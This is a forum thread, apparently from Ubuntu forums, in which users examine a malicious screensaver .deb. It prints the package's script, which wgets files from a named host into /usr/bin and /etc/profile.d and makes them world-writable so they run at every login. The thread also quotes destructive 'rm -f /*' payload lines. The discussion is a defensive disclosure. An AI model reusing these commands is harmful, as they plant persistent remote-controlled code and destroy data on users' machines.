YOU THERE!! Malicios script installed as a DEB, please read!

[hoppipolla]

then they just add a gksu or something to the script
most people don't know inside what kind of package a screensaver should be.

well, true. It's tricky when people are given so much freedom to put whatever they want into packages.

However, I still think we need to enhance package management to recognize different users more.

Not everything should be installed as root, IMO

Quite contrary, this is not a hole in the system. This is social engineering applied outside of lab testing.
It is no surprise that people fell for the cookie.

But as much as we teach you not to download anything from untrusted sites - people will fall for the "Linux Security" propaganda and get complacent.

Linux is a strong system not because of the system being "built ground up for security", that is but a small piece in the puzzle. Linux is a strong system because it's users are generally "in the know" about threats and prevention.

I don't agree at all, Linux IS more secure from the ground-up due to it's strict permissions system, not opening too many ports, rapid open source development and probably other things that I am not aware of

[pbrane]

Has anyone tried to contact Interserver, Inc.?

abuse@trouble-free.net

they host 05748.t35.com

[fatality_uk]

This is neither end of days - nor Linux being hacked. Think of this as a warning to all Debian system users who download and run untrusted files and installers on their production machines.

99% of other Linux users will carry on their everyday life not knowing this ever happened...

I know!! I am aware of what the script does/did. Its the "spin" i'm talking about, not the fact that this script which wont propagate against

[koenn]

As far as I can tell, the command there was

Code:

 sudo rm -f /*

(need tinvole to confirm this)

This wouldn't have caused damage - you need a -r there too to delete folders.

10 minutes ago it said:

Code:

 rm -f /*.*
echo "You see this? It's changed, before it was set to ping?"

As someone pointed out, the trojan downloads this file at every run (ie every logon) so the payload can be updated indefinitely.
i.e. it looks as if this kid is experimenting with payloads and has some trouble getting the syntax right.
Or it's a proof of concept - assuming the (ineffective) command will be shown together with the echo msg - something like "see what I could do" - although you'd have to run that as root to do real damage

[EnGorDiaz]

Hello guys Im going to make this breef

I have installed a deb from a site claiming to be an Screensaver however it looked dodgy however I proceeded.

after I looked into the source I found MYSTERIOS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
(also no screensaver was ever shown in gnome-screensaver)

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit


Im no expert but this looks just wrong!!

I have removed the package however I i doubt this has done much good...

Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.

This all just litterally happened in the last few minutes and im affraid to reboot my computer.. should I reinstall my gnome packages?

Or was I just being paranoid? Im thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...

Sorry for sounding strange, Just trying to fix this A.S.A.P.

Thank you for any suggestions.

that is not for a screensaver

that is for a irc bot

[NoaHall]

that is not for a screensaver

that is for a irc bot

No it's not, but hey. We've solved it.

koenn - Yeah, from the quote on the website too, I don't think it was meant to cause damage yet - just a attempt - or maybe when he found he was discovered, he tried to make it just look like a attempt.

[akashiraffee]

Thanks very much for this.
Can be run without super yes?

Yeah, strangely enough "ps -A" shows all processes even if they aren't yours.

It won't use any resources. You can leave it on all day, etc.

[Random-penguin]

We have a "Security Discussions" sub-forum.

Although, no one really ever reads the stickies in there.

Ubuntu Security. Written by bodhi.zazen

Regards

Which says to me this method of getting the message across is not working... I'm not saying I know the answer but maybe this does need to be examined by those that package Ubuntu.....

[lisati]

Just looked at the website. There've been changes apparently.

[NoaHall]

Just looked at the website. There've been changes apparently.

Well, maybe he's decided to go back to where ever he came from. Hopefully.

Most likely though, he's deleted his account there and made a new one else where.